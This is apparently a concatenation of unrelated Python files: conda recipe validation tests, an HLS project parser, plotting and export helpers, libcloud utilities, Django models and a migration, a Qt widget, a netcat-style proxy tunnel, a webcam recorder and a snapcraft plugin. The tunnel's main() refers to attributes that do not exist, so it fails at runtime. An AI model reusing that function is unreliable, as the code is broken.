exit_on_error=False) assert '[C2110] Found invalid field "gti_url" in section "source"' in error def test_invalid_build_field_key(recipe_dir): recipe = os.path.join(recipe_dir, 'invalid_build_field_key') metadata = utilities.render_metadata(recipe, None) with pytest.raises(RecipeError): Verify.verify_recipe(rendered_meta=metadata, recipe_dir=recipe, exit_on_error=True) package, error = Verify.verify_recipe(rendered_meta=metadata, recipe_dir=recipe, exit_on_error=False) assert '[C2110] Found invalid field "yesarch" in section "build"' in error def test_invalid_requirements_field_key(recipe_dir): recipe = os.path.join(recipe_dir, 'invalid_requirements_field_key') metadata = utilities.render_metadata(recipe, None) with pytest.raises(RecipeError): Verify.verify_recipe(rendered_meta=metadata, recipe_dir=recipe, exit_on_error=True) package, error = Verify.verify_recipe(rendered_meta=metadata, recipe_dir=recipe, exit_on_error=False) assert '[C2110] Found invalid field "extra_field" in section "requirements"' in error def test_invalid_test_field_key(recipe_dir): recipe = os.path.join(recipe_dir, 'invalid_test_field_key') metadata = utilities.render_metadata(recipe, None) with pytest.raises(RecipeError): Verify.verify_recipe(rendered_meta=metadata, recipe_dir=recipe, exit_on_error=True) package, error = Verify.verify_recipe(rendered_meta=metadata, recipe_dir=recipe, exit_on_error=False) assert '[C2110] Found invalid field "no_files" in section "test"' in error def test_invalid_about_field_key(recipe_dir): recipe = os.path.join(recipe_dir, 'invalid_about_field_key') metadata = utilities.render_metadata(recipe, None) with pytest.raises(RecipeError): Verify.verify_recipe(rendered_meta=metadata, recipe_dir=recipe, exit_on_error=True) package, error = Verify.verify_recipe(rendered_meta=metadata, recipe_dir=recipe, 
exit_on_error=False) assert '[C2110] Found invalid field "something_extra" in section "about"' in error def test_invalid_app_field_key(recipe_dir): recipe = os.path.join(recipe_dir, 'invalid_app_field_key') metadata = utilities.render_metadata(recipe, None) with pytest.raises(RecipeError): Verify.verify_recipe(rendered_meta=metadata, recipe_dir=recipe, exit_on_error=True) package, error = Verify.verify_recipe(rendered_meta=metadata, recipe_dir=recipe, exit_on_error=False) assert '[C2110] Found invalid field "noentry" in section "app"' in error def test_invalid_package_name(recipe_dir): recipe = os.path.join(recipe_dir, 'invalid_package_name') metadata = utilities.render_metadata(recipe, None) with pytest.raises(RecipeError): Verify.verify_recipe(rendered_meta=metadata, recipe_dir=recipe, exit_on_error=True) package, error = Verify.verify_recipe(rendered_meta=metadata, recipe_dir=recipe, exit_on_error=False) assert '[C2102] Found invalid package name "some_package." in meta.yaml' in error def test_invalid_package_sequence(recipe_dir): recipe = os.path.join(recipe_dir, 'invalid_package_sequence') metadata = utilities.render_metadata(recipe, None) with pytest.raises(RecipeError): Verify.verify_recipe(rendered_meta=metadata, recipe_dir=recipe, exit_on_error=True) package, error = Verify.verify_recipe(rendered_meta=metadata, recipe_dir=recipe, exit_on_error=False) assert '[C2103] Found invalid sequence "_-" in package name' in error def test_no_package_version(recipe_dir): recipe = os.path.join(recipe_dir, 'no_package_version') metadata = utilities.render_metadata(recipe, None) with pytest.raises(RecipeError): Verify.verify_recipe(rendered_meta=metadata, recipe_dir=recipe, exit_on_error=True) package, error = Verify.verify_recipe(rendered_meta=metadata, recipe_dir=recipe, exit_on_error=False) assert '[C2104] Missing package version in meta.yaml' in error def test_invalid_package_version(recipe_dir): recipe = os.path.join(recipe_dir, 'invalid_package_version') metadata = utilities.render_metadata(recipe, None) with pytest.raises(RecipeError): Verify.verify_recipe(rendered_meta=metadata, recipe_dir=recipe, exit_on_error=True) package, error = Verify.verify_recipe(rendered_meta=metadata, recipe_dir=recipe, exit_on_error=False) assert '[C2105] Found invalid package version "1.0.0rc3!" 
in meta.yaml' in error def test_invalid_package_version_prefix(recipe_dir): recipe = os.path.join(recipe_dir, 'invalid_package_version_prefix') metadata = utilities.render_metadata(recipe, None) with pytest.raises(RecipeError): Verify.verify_recipe(rendered_meta=metadata, recipe_dir=recipe, exit_on_error=True) package, error = Verify.verify_recipe(rendered_meta=metadata, recipe_dir=recipe, exit_on_error=False) assert '[C2105] Found invalid package version "_1.0.0rc3" in meta.yaml' in error def test_invalid_package_version_sequence(recipe_dir): recipe = os.path.join(recipe_dir, 'invalid_package_version_sequence') metadata = utilities.render_metadata(recipe, None) with pytest.raises(RecipeError): Verify.verify_recipe(rendered_meta=metadata, recipe_dir=recipe, exit_on_error=True) package, error = Verify.verify_recipe(rendered_meta=metadata, recipe_dir=recipe, exit_on_error=False) assert '[C2106] Found invalid sequence "._" in package version' in error def test_invalid_build_number(recipe_dir): recipe = os.path.join(recipe_dir, 'invalid_build_number') metadata = utilities.render_metadata(recipe, None) with pytest.raises(RecipeError): Verify.verify_recipe(rendered_meta=metadata, recipe_dir=recipe, exit_on_error=True) package, error = Verify.verify_recipe(rendered_meta=metadata, recipe_dir=recipe, exit_on_error=False) assert '[C2107] Build number in info/index.json must be an integer' in error def test_invalid_build_number_negative(recipe_dir): recipe = os.path.join(recipe_dir, 'invalid_build_number_negative') metadata = utilities.render_metadata(recipe, None) with pytest.raises(RecipeError): Verify.verify_recipe(rendered_meta=metadata, recipe_dir=recipe, exit_on_error=True) package, error = Verify.verify_recipe(rendered_meta=metadata, recipe_dir=recipe, exit_on_error=False) assert '[C2108] Build number in info/index.json cannot be a negative integer' in error def test_invalid_source_url(recipe_dir): recipe = os.path.join(recipe_dir, 'invalid_source_url') metadata = utilities.render_metadata(recipe, None) with pytest.raises(RecipeError): Verify.verify_recipe(rendered_meta=metadata, recipe_dir=recipe, exit_on_error=True) package, error = Verify.verify_recipe(rendered_meta=metadata, recipe_dir=recipe, exit_on_error=False) assert '[C2120] Found invalid URL "www.continuum.io" in meta.yaml' in error def test_invalid_about_summary(recipe_dir): recipe = os.path.join(recipe_dir, 'invalid_about_summary') metadata = utilities.render_metadata(recipe, None) with pytest.raises(RecipeError): Verify.verify_recipe(rendered_meta=metadata, recipe_dir=recipe, exit_on_error=True) package, error = Verify.verify_recipe(rendered_meta=metadata, recipe_dir=recipe, exit_on_error=False) assert '[C2117] Found summary with length greater than 80 characters' in error def test_invalid_about_url(recipe_dir): recipe = os.path.join(recipe_dir, 'invalid_about_url') metadata = utilities.render_metadata(recipe, None) with pytest.raises(RecipeError): Verify.verify_recipe(rendered_meta=metadata, recipe_dir=recipe, exit_on_error=True) package, error = Verify.verify_recipe(rendered_meta=metadata, recipe_dir=recipe, exit_on_error=False) assert '[C2118] Found invalid URL "www.continuum.io" in meta.yaml' in error def test_invalid_source_hash(recipe_dir): recipe = os.path.join(recipe_dir, 'invalid_source_hash') metadata = utilities.render_metadata(recipe, None) with pytest.raises(RecipeError): Verify.verify_recipe(rendered_meta=metadata, recipe_dir=recipe, exit_on_error=True) package, error = Verify.verify_recipe(rendered_meta=metadata, 
recipe_dir=recipe, exit_on_error=False) assert '[C2119] Found invalid hash "abc123" in meta.yaml' in error def test_invalid_license_family(recipe_dir): recipe = os.path.join(recipe_dir, 'invalid_license_family') metadata = utilities.render_metadata(recipe, None) with pytest.raises(RecipeError): Verify.verify_recipe(rendered_meta=metadata, recipe_dir=recipe, exit_on_error=True) package, error = Verify.verify_recipe(rendered_meta=metadata, recipe_dir=recipe, exit_on_error=False) assert '[C2122] Found invalid license family "The Extra License"' in error def test_invalid_test_files(recipe_dir): recipe = os.path.join(recipe_dir, 'invalid_test_files') metadata = utilities.render_metadata(recipe, None) with pytest.raises(RecipeError): Verify.verify_recipe(rendered_meta=metadata, recipe_dir=recipe, exit_on_error=True) package, error = Verify.verify_recipe(rendered_meta=metadata, recipe_dir=recipe, exit_on_error=False) assert '[C2124] Found file "test-data.txt" in meta.yaml that doesn\'t exist' in error def test_invalid_test_file_path(recipe_dir): recipe = os.path.join(recipe_dir, 'invalid_test_file_path') metadata = utilities.render_metadata(recipe, None) with pytest.raises(RecipeError): Verify.verify_recipe(rendered_meta=metadata, recipe_dir=recipe, exit_on_error=True) package, error = Verify.verify_recipe(rendered_meta=metadata, recipe_dir=recipe, exit_on_error=False) assert '[C2123] Found file "../test-data.txt" listed outside recipe directory' in error def test_invalid_dir_content(recipe_dir): recipe = os.path.join(recipe_dir, 'invalid_dir_content') metadata = utilities.render_metadata(recipe, None) with pytest.raises(RecipeError): Verify.verify_recipe(rendered_meta=metadata, recipe_dir=recipe, exit_on_error=True) package, error = Verify.verify_recipe(rendered_meta=metadata, recipe_dir=recipe, exit_on_error=False) assert any('[C2125] Found disallowed file with extension' in e for e in error) assert any('testfile.tar' in e for e in error) def test_invalid_dir_content_filesize(recipe_dir): recipe = os.path.join(recipe_dir, 'invalid_dir_content_filesize') metadata = utilities.render_metadata(recipe, None) with pytest.raises(RecipeError): Verify.verify_recipe(rendered_meta=metadata, recipe_dir=recipe, exit_on_error=True) package, error = Verify.verify_recipe(rendered_meta=metadata, recipe_dir=recipe, exit_on_error=False) assert any('[C2125] Found disallowed file with extension' in e for e in error) assert any('test.tar.bz2' in e for e in error) def test_duplicate_version_specifications(recipe_dir): recipe = os.path.join(recipe_dir, 'duplicate_version_specs') metadata = utilities.render_metadata(recipe, None) with pytest.raises(RecipeError): Verify.verify_recipe(rendered_meta=metadata, recipe_dir=recipe, exit_on_error=True) package, error = Verify.verify_recipe(rendered_meta=metadata, recipe_dir=recipe, exit_on_error=False) assert "[C2116] Found duplicate run requirements: ['python', 'python']" in error def test_conda_forge_example_recipe(recipe_dir): recipe = os.path.join(recipe_dir, 'conda_forge') metadata = utilities.render_metadata(recipe, None) with pytest.raises(RecipeError): Verify.verify_recipe(rendered_meta=metadata, recipe_dir=recipe, exit_on_error=True) package, error = Verify.verify_recipe(rendered_meta=metadata, recipe_dir=recipe, exit_on_error=False) assert '[C2126] Found conda-forge comment in meta.yaml file' in error def test_invalid_outputs(recipe_dir): recipe = os.path.join(recipe_dir, 'invalid_output') metadata = utilities.render_metadata(recipe, None) with 
pytest.raises(RecipeError): Verify.verify_recipe(rendered_meta=metadata, recipe_dir=recipe, exit_on_error=True) package, error = Verify.verify_recipe(rendered_meta=metadata, recipe_dir=recipe, exit_on_error=False) assert '[C2110] Found invalid field "srcitp" in section "outputs"' in error @pytest.mark.skipif(os.getenv('CONDA_BUILD') == '1', reason='conda build handles invalid sources at runtime') def test_invalid_sources(recipe_dir): recipe = os.path.join(recipe_dir, 'invalid_sources') metadata = utilities.render_metadata(recipe, None) with pytest.raises(RecipeError): Verify.verify_recipe(rendered_meta=metadata, recipe_dir=recipe, exit_on_error=True) package, error = Verify.verify_recipe(rendered_meta=metadata, recipe_dir=recipe, exit_on_error=False) assert '[C2121] Found both git_branch and git_tag in meta.yaml source field' in error def test_duplicate_build_requirements(recipe_dir): recipe = os.path.join(recipe_dir, 'duplicate_build_requirements') metadata = utilities.render_metadata(recipe, None) with pytest.raises(RecipeError): Verify.verify_recipe(rendered_meta=metadata, recipe_dir=recipe, exit_on_error=True) package, error = Verify.verify_recipe(rendered_meta=metadata, recipe_dir=recipe, exit_on_error=False) assert ("[C2115] Found duplicate build requirements: ['python', 'python']" in error or "[C2115] Found duplicate build requirements: ['python 3.6.*', 'python 3.6.*']" in error) @pytest.mark.skipif(os.getenv('CONDA_BUILD') == '1', reason='conda build handles invalid characters at runtime') def test_invalid_build_requirement_name(recipe_dir): recipe = os.path.join(recipe_dir, 'invalid_build_requirement_name') metadata = utilities.render_metadata(recipe, None) with pytest.raises(RecipeError): Verify.verify_recipe(rendered_meta=metadata, recipe_dir=recipe, exit_on_error=True) package, error = Verify.verify_recipe(rendered_meta=metadata, recipe_dir=recipe, exit_on_error=False) assert '[C2111] Found invalid build requirement "python!"' in error @pytest.mark.skipif(os.getenv('CONDA_BUILD') == '1', reason='conda build handles invalid requirement versions at runtime') def test_invalid_build_requirement_version(recipe_dir): recipe = os.path.join(recipe_dir, 'invalid_build_requirement_version') metadata = utilities.render_metadata(recipe, None) with pytest.raises(RecipeError): Verify.verify_recipe(rendered_meta=metadata, recipe_dir=recipe, exit_on_error=True) package, error = Verify.verify_recipe(rendered_meta=metadata, recipe_dir=recipe, exit_on_error=False) assert '[C2114] Found invalid dependency "setuptools >= 3.4 < 3045" in meta.yaml' in error @pytest.mark.skipif(os.getenv('CONDA_BUILD') == '1', reason='conda build handles invalid characters at runtime') def test_invalid_run_requirement_name(recipe_dir): recipe = os.path.join(recipe_dir, 'invalid_run_requirement_name') metadata = utilities.render_metadata(recipe, None) with pytest.raises(RecipeError): Verify.verify_recipe(rendered_meta=metadata, recipe_dir=recipe, exit_on_error=True) package, error = Verify.verify_recipe(rendered_meta=metadata, recipe_dir=recipe, exit_on_error=False) assert '[C2112] Found invalid run requirement "python@#"' in error @pytest.mark.skipif(os.getenv('CONDA_BUILD') == '1', reason='conda build handles missing package names at runtime') def test_no_package_name(recipe_dir): recipe = os.path.join(recipe_dir, 'no_package_name') metadata = utilities.render_metadata(recipe, None) with pytest.raises(RecipeError): Verify.verify_recipe(rendered_meta=metadata, recipe_dir=recipe, exit_on_error=True) package, error = 
Verify.verify_recipe(rendered_meta=metadata, recipe_dir=recipe, exit_on_error=False) assert '[C2101] Missing package name in meta.yaml' in error import re import os import defusedxml.ElementTree as ET from . import Backend from .. import Port, IOType, ValueType from ..exception import NoHLSProjectError, InvalidHLSProjectError from ..exception import NoSpecifiedHLSProjectError, ManyHLSProjectsError class VivadoBackend(Backend): """A Backend subclass representing the Vivado HLS backend.""" def process_solutions(self, path: str, hls_project_name: str) -> (str, list): project_path = None if hls_project_name is None: for root, directories, files in os.walk(path): for f in files: if f == 'vivado_hls.app': if project_path is None: project_path = root else: raise ManyHLSProjectsError if project_path is None: raise NoHLSProjectError else: project_path = os.path.join(path, hls_project_name) if not os.path.exists(project_path) or \ 'vivado_hls.app' not in os.listdir(project_path): raise NoSpecifiedHLSProjectError solutions_to_return = [] try: hls_config_tree = ET.parse(os.path.join(project_path, 'vivado_hls.app')) root = hls_config_tree.getroot() solutions = None for child in root: if child.tag.endswith('solutions'): solutions = child break if solutions is None: raise RuntimeError( 'Could not find the "solutions" tag in vivado_hls.app') for solution in solutions: name = solution.get('name') if name is not None: solutions_to_return.append(name) except Exception as ex: raise InvalidHLSProjectError(exception=ex) return project_path, solutions_to_return def get_hdl_dir_path(self, proj_path: str, solution: str) -> str: return os.path.join(proj_path, solution, 'impl', 'ip', 'hdl') def get_ip_hdl_file_path(self, proj_path: str, solution: str) -> str: return os.path.join(self.get_hdl_dir_path(proj_path, solution), 'vhdl', 'myproject.vhd') def parse_ports(self, hdl_str: str) -> list: regex = re.compile( r'entity\s+myproject\s+is\s+port\s*\((.*)\)\s*;\s*end\s*;', flags=re.DOTALL|re.IGNORECASE) res = regex.search(hdl_str) port_lines = map(str.strip, res.group(1).split('\n')) ports = [] line_regex = re.compile(r'(\S+)\s*:\s+(in|out)\s+([^;]+);?', flags=re.IGNORECASE) for line in port_lines: line_res = line_regex.search(line) if line_res is None: continue ports.append(Port(line_res.group(1), IOType.INPUT if line_res.group(2).lower() == 'in' else IOType.OUTPUT, ValueType.convert(line_res.group(3)))) return ports def parse_num_inputs(self, ports: list, hdl_str: str) -> int: const_size_in_name = None for port in ports: if port.name.startswith('const_size_in'): const_size_in_name = port.name break if const_size_in_name is None: return None regex = re.compile(const_size_in_name + r'\s+<=\s+(\S+)\s*;', flags=re.IGNORECASE) res = regex.search(hdl_str) if res is None: return None const_name = res.group(1) regex = re.compile( r'constant\s+' + const_name + r'\s*:\s+std_logic_vector.+:=\s*"([01]+)"\s*;', flags=re.IGNORECASE) res = regex.search(hdl_str) if res is None: return None return int(res.group(1), 2) # -*- coding: utf-8 -*- """ Created on Fri Jan 29 09:55:11 2016 @author: sthomp A multi plot creator to create Vetting type documents for our detected signals. 
This code is depricated, see pipeline.multiPagePlot """ from matplotlib.backends.backend_pdf import PdfPages import matplotlib.pyplot as plt import dave.pipeline.plotting as pp import dave.diffimg.plot as dip def plot_all_multipages(outfile,clip,intext): """Take a clipboard, clip, and create plots put these plots all into one multi paged document specifieed by outfile """ dotperinch=300 figuresize=(10,8) # The PDF document pdf_pages = PdfPages(outfile) # Create a figure instance (ie. a new page) #pdf_pages.attach_note(('KIC %u [%u]' % (clip.value, clip.disposition.isCandidate)),positionRect=[100,200,10,400]) fig = plt.figure(figsize=figuresize, dpi=dotperinch) plt.figtext(0.5,0.5,intext,color='r',fontsize=15) fig.patch.set_visible(False) plt.gca().axis('off') pdf_pages.savefig(fig) plt.close() fig = plt.figure(figsize=figuresize, dpi=dotperinch) # Plot whatever you wish to plot pp.summaryPlot1(clip) # Done with the page pdf_pages.savefig(fig) plt.close() fig = plt.figure(figsize=figuresize, dpi=dotperinch) pp.indivTransitPlot(clip,7) pdf_pages.savefig(fig) plt.close() try: fig = plt.figure(figsize=figuresize, dpi=dotperinch) pp.blsPlot(clip) pdf_pages.savefig(fig) plt.close() except AttributeError: pass try: fig = plt.figure(figsize=figuresize, dpi=dotperinch) plt.figtext(0.2,0.35,clip.disposition,color='b',fontsize=14) plt.title('Disposition Information in Clipboard') pdf_pages.savefig(fig) plt.close() except: pass try: #Plot centroid plots (fig1,fig2)=dip.plotWrapper(clip) except: fig1=plt.plot() fig2=plt.plot() pdf_pages.savefig(fig2) pdf_pages.savefig(fig1) plt.close() plt.close() # Write the PDF document to the disk pdf_pages.close() plt.close() #%% def createExportString(clip, delimiter=" ", badValue="nan"): """Create a line of text for the exporter Inputs: ------------ clip A clipboard object Optional Inputs: ----------------- delimiter: (string) The character, or set of characters to separate elements badValue (string) String to be output when a value isn't present Returns: ----------- Two strings. The first is the text to be exported. The second is the list of keys that were exported """ keysForExport = ( ('value' , '%10i'), \ ('trapFit.period_days', '%7.3f'), \ ('trapFit.epoch_bkjd', '%12.6f'), \ ('trapFit.duration_hrs', '%7.3f'), \ ('trapFit.snr', '%6.2f'), \ ('disposition.isSignificantEvent', '%1i'), \ ('disposition.isCandidate', '%i'), \ ('disposition.reasonForFail', '%s'), \ ) hdr = [] text = [] for tup in keysForExport: key, fmt = tup hdr.append(key) try: text.append( fmt % (clip[key])) except KeyError: text.append(badValue) text = delimiter.join(text) hdr = delimiter.join(hdr) return text, hdr bopopescu/conpaas-1 # Licensed to the Apache Software Foundation (ASF) under one or more # contributor license agreements. See the NOTICE file distributed with # this work for additional information regarding copyright ownership. # The ASF licenses this file to You under the Apache License, Version 2.0 # (the "License"); you may not use this file except in compliance with # the License. You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. 
import os import mimetypes from libcloud.utils.py3 import PY3 from libcloud.utils.py3 import httplib from libcloud.utils.py3 import next from libcloud.utils.py3 import b CHUNK_SIZE = 8096 if PY3: from io import FileIO as file def read_in_chunks(iterator, chunk_size=None, fill_size=False): """ Return a generator which yields data in chunks. @type iterator: C{Iterator} @param response: An object which implements an iterator interface or a File like object with read method. @type chunk_size: C{int} @param chunk_size: Optional chunk size (defaults to CHUNK_SIZE) @type fill_size: C{bool} @param fill_size: If True, make sure chunks are chunk_size in length (except for last chunk). TODO: At some point in the future we could use byte arrays here if version >= Python 3. This should speed things up a bit and reduce memory usage. """ chunk_size = chunk_size or CHUNK_SIZE if isinstance(iterator, (file, httplib.HTTPResponse)): get_data = iterator.read args = (chunk_size, ) else: get_data = next args = (iterator, ) data = b('') empty = False while not empty or len(data) > 0: if not empty: try: chunk = b(get_data(*args)) if len(chunk) > 0: data += chunk else: empty = True except StopIteration: empty = True if len(data) == 0: raise StopIteration if fill_size: if empty or len(data) >= chunk_size: yield data[:chunk_size] data = data[chunk_size:] else: yield data data = b('') def exhaust_iterator(iterator): """ Exhaust an iterator and return all data returned by it. @type iterator: C{Iterator} @param response: An object which implements an iterator interface or a File like object with read method. @rtype C{str} @return Data returned by the iterator. """ data = b('') try: chunk = b(next(iterator)) except StopIteration: chunk = b('') while len(chunk) > 0: data += chunk try: chunk = b(next(iterator)) except StopIteration: chunk = b('') return data def guess_file_mime_type(file_path): filename = os.path.basename(file_path) (mimetype, encoding) = mimetypes.guess_type(filename) return mimetype, encoding # Generated by Django 3.1.11 on 2021-09-09 14:18 from django.conf import settings from django.db import migrations, models import django.db.models.deletion class Migration(migrations.Migration): dependencies = [ migrations.swappable_dependency(settings.AUTH_USER_MODEL), ('termsofuse', '0001_initial'), ] operations = [ migrations.CreateModel( name='TermsOfUseSignature', fields=[ ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')), ('created', models.DateTimeField(auto_now_add=True)), ], ), migrations.RemoveField( model_name='termsofusedocument', name='is_active', ), migrations.RemoveField( model_name='termsofusedocument', name='updated', ), migrations.DeleteModel( name='TermsOfUsePeriod', ), migrations.AddField( model_name='termsofusesignature', name='document', field=models.ForeignKey(null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='signatures', to='termsofuse.termsofusedocument'), ), migrations.AddField( model_name='termsofusesignature', name='user', field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='signatures', to=settings.AUTH_USER_MODEL), ), ] from PySide6.QtWidgets import QFrame, QGridLayout, QLabel, QLineEdit, QWidget from PySide6.QtGui import QIcon from PySide6.QtCore import Qt from data import Data from utils import validators class AutoCroppingRelative(QFrame): """ A widget for parameters selection for automatic relative cropping method. 
Relative cropping means that user inputs how many relative data units should be cut off of each of the sides. """ def __init__(self, parent: QWidget = None) -> None: """ The constructor for auto relative cropping parameters selection widget. Parameters: parent (QWidget): Parent widget of this widget. Default: None. """ super().__init__(parent) self.setObjectName("method_instance") self.icon = QIcon("icons/cut.svg") # inputs self.init_inputs_value = 0 self.from_start = QLineEdit(str(self.init_inputs_value), validator=validators.POSITIVE_INT_VALIDATOR) self.from_end = QLineEdit(str(self.init_inputs_value), validator=validators.POSITIVE_INT_VALIDATOR) # put widgets into layout layout = QGridLayout() layout.addWidget(QLabel("Spectral Plot Cropping - Relative"), 0, 0) layout.addWidget(QLabel("Data Points to Crop (Beginning)"), 1, 0) layout.addWidget(self.from_start, 1, 1) layout.addWidget(QLabel("Data Points to Crop (End)"), 2, 0) layout.addWidget(self.from_end, 2, 1) layout.setColumnStretch(layout.columnCount(), 1) layout.setAlignment(Qt.AlignVCenter) self.setLayout(layout) def get_params(self) -> tuple[int, int]: """ A function to return parameters of the method with the correct types. Returns: parameters (tuple): Tuple of method's parameters. """ parameters = (int(self.from_start.text()), int(self.from_end.text()), ) return parameters def params_to_text(self) -> str: """ A function to return parameters as strings with corresponding meanings. Returns: str_parameters (str): String of parameters and their meaning. """ str_parameters = f"crop from start: {int(self.from_start.text())}, crop from end: {int(self.from_end.text())}" return str_parameters def function_name(self) -> str: """ A function to return name of the function that this widget represents. Returns: function_name (str): Name of the function that the parameters from this widget are for. """ return Data.auto_crop_relative.__name__ def get_string_name(self) -> str: """ A function to return name of this widget as a string. Returns: widget_name (str): Name of the widget so that it can be recognized by the user. 
""" return "Cropping - Relative" import sys import logging import argparse import gevent from urllib.parse import urlparse from gevent.socket import create_connection from ._tools import (LOG_LEVEL, nc_forward_stdin, nc_forward_stdout, get_krb_token, proxy_host_from_env, proxy_port_from_env) def netcat(host, port, proxy_host, proxy_port, verbose): logger = logging.getLogger() formatter = logging.Formatter('%(asctime)s %(levelname)-8s %(message)s') handler = logging.StreamHandler() handler.setFormatter(formatter) logger.addHandler(handler) verbose = 0 if verbose <= 0 else 1 if verbose: logger.setLevel(LOG_LEVEL[verbose]) else: logging.disable(LOG_LEVEL[0]) request = bytearray( b'CONNECT %b:%d HTTP/1.1' % (host.encode(), port) + b'\r\n' + b'Host: %b:%d' % (proxy_host.encode(), proxy_port) + b'\r\n' + b'Proxy-Connection: Keep-Alive' ) dst = create_connection((proxy_host, proxy_port)) dst.sendall(request) data = bytearray() while True: data.extend(dst.recv(1024)) if b'\r\n\r\n' in data: break if b'200 Connection established' not in data and b'407' in data: krb_token = get_krb_token(proxy_host) request.extend(b'\r\n' + b'Proxy-Authorization: Negotiate %b' % krb_token) try: dst.sendall(request) except: # if proxy does not support Keep-Alive dst.close() dst = create_connection((proxy_host, proxy_port)) dst.sendall(request) data = bytearray() while True: data.extend(dst.recv(1024)) if b'\r\n\r\n' in data: break if b'200 Connection established' in data: logging.info('Proxy connection established\n') data = data.split(b'\r\n\r\n', 1)[1] if data: dst.sendall(data) forwarders = (gevent.spawn(nc_forward_stdin, dst), gevent.spawn(nc_forward_stdout, dst)) gevent.joinall(forwarders) elif b'407' in data: logging.info('Proxy authentication failed\n') else: version, status_code, status_message = ( data.split(b'\r\n', 1)[0].split(b' ', 2) ) logging.info(f'Proxy returned {status_code} {status_message}\n') def main(): default_proxy = "{}:{}".format(proxy_host_from_env(), proxy_port_from_env()) parser = argparse.ArgumentParser( description='A thin netcat-like implementation that handles Proxy ' 'Authentication for applications that cannot do so on their' 'own.') parser.add_argument('host', metavar='TARGET:PORT', help='Hostname or IP to tunnel a connection to. ' 'Provide in format of hostname:port') parser.add_argument('proxy', metavar='PROXY:PORT', nargs="?", default=default_proxy, help='Address/hostname of the proxy and port. ' 'Provide in format hostname:port') parser.add_argument('-v', '--verbose', action='count', default=0, help="Add verbose output") args = parser.parse_args() host, port = urlparse(args.target).host, urlparse(args.target).port proxy_host, proxy_port = urlparse(args.proxy).host, urlparse(args.proxy).port try: netcat(host, port, proxy_host, proxy_port, args.verbose) except KeyboardInterrupt: sys.exit("Closing down") 10-100 from datetime import datetime import time import cv2 def webcam_record(src=0, output_path=None): """ Record video from a video capture source and write to .mp4 file. Output FPS is equal to average FPS over the duration of the recording. 
""" if output_path is None: output_path = datetime.now().strftime("%Y%m%d%H%M%s.mp4") if not output_path.endswith(".mp4"): output_path += ".mp4" cap = cv2.VideoCapture(src) assert cap.isOpened(), "VideoCapture not opened" frames = [] start_time = time.time() while True: grabbed, frame = cap.read() if not grabbed: break frames.append(frame) cv2.imshow("Stream", frame) if cv2.waitKey(1) == ord("q"): break end_time = time.time() cap.release() assert frames, "No frames captured" average_fps = int(1 / ((end_time - start_time) / len(frames))) h, w = frames[0].shape[:2] writer = cv2.VideoWriter( output_path, cv2.VideoWriter_fourcc(*"mp4v"), average_fps, (w, h) ) for frame in frames: writer.write(frame) writer.release() 100-1000 from __future__ import unicode_literals from __future__ import absolute_import from django.conf import settings from django.db import models from .. import exc from .circuit import Circuit from .resource import Resource class Device(Resource): """Represents a network device.""" hostname = models.CharField( max_length=255, null=False, db_index=True, help_text='The hostname of the Device.' ) site = models.ForeignKey( 'Site', db_index=True, related_name='devices', on_delete=models.PROTECT, verbose_name='Site', help_text='Unique ID of the Site this Device is under.' ) def __unicode__(self): return u'%s' % self.hostname class Meta: unique_together = ('site', 'hostname') index_together = unique_together @property def circuits(self): """All circuits related to this Device.""" interfaces = self.interfaces.all() circuits = [] for intf in interfaces: try: circuits.append(intf.circuit) except Circuit.DoesNotExist: continue return circuits def clean_hostname(self, value): if not value: raise exc.ValidationError({ 'hostname': 'Hostname must be non-zero length string.' }) if not settings.DEVICE_NAME.match(value): raise exc.ValidationError({ 'name': 'Invalid name: %r.' % value }) return value def clean_fields(self, exclude=None): self.hostname = self.clean_hostname(self.hostname) def save(self, *args, **kwargs): self.full_clean() super(Device, self).save(*args, **kwargs) def to_dict(self): return { 'id': self.id, 'site_id': self.site_id, 'hostname': self.hostname, 'attributes': self.get_attributes(), } # -*- Mode:Python; indent-tabs-mode:nil; tab-width:4 -*- # # Modified by on 2018-10-01 to add support for ppc64el and s390x # # Copyright (C) 2015-2017 Canonical Ltd # # This program is free software: you can redistribute it and/or modify # it under the terms of the GNU General Public License version 3 as # published by the Free Software Foundation. # # This program is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the # GNU General Public License for more details. # # You should have received a copy of the GNU General Public License # along with this program. If not, see . """The nodejs plugin is useful for node/npm based parts. The plugin uses node to install dependencies from `package.json`. It also sets up binaries defined in `package.json` into the `PATH`. This plugin uses the common plugin keywords as well as those for "sources". For more information check the 'plugins' topic for the former and the 'sources' topic for the latter. Additionally, this plugin uses the following plugin-specific keywords: - node-packages: (list) A list of dependencies to fetch using npm. - node-engine: (string) The version of nodejs you want the snap to run on. 
- npm-run: (list) A list of targets to `npm run`. These targets will be run in order, after `npm install` - npm-flags: (list) A list of flags for npm. - node-package-manager (string; default: npm) The language package manager to use to drive installation of node packages. Can be either `npm` (default) or `yarn`. """ import collections import contextlib import json import logging import os import shutil import subprocess import sys import snapcraft from snapcraft import sources from snapcraft.file_utils import link_or_copy_tree from snapcraft.internal import errors logger = logging.getLogger(__name__) _NODEJS_BASE = "node-v{version}-linux-{arch}" _NODEJS_VERSION = "12.18.3" _NODEJS_TMPL = "https://nodejs.org/dist/v{version}/{base}.tar.gz" _NODEJS_ARCHES = {"i386": "x86", "amd64": "x64", "armhf": "armv7l", "arm64": "arm64", "ppc64el": "ppc64le", "s390x": "s390x"} _YARN_URL = "https://yarnpkg.com/latest.tar.gz" class NodePlugin(snapcraft.BasePlugin): @classmethod def schema(cls): schema = super().schema() schema["properties"]["node-packages"] = { "type": "array", "minitems": 1, "uniqueItems": True, "items": {"type": "string"}, "default": [], } schema["properties"]["node-engine"] = { "type": "string", "default": _NODEJS_VERSION, } schema["properties"]["node-package-manager"] = { "type": "string", "default": "npm", "enum": ["npm", "yarn"], } schema["properties"]["npm-run"] = { "type": "array", "minitems": 1, "uniqueItems": False, "items": {"type": "string"}, "default": [], } schema["properties"]["npm-flags"] = { "type": "array", "minitems": 1, "uniqueItems": False, "items": {"type": "string"}, "default": [], } if "required" in schema: del schema["required"] return schema @classmethod def get_build_properties(cls): # Inform Snapcraft of the properties associated with building. If these # change in the YAML 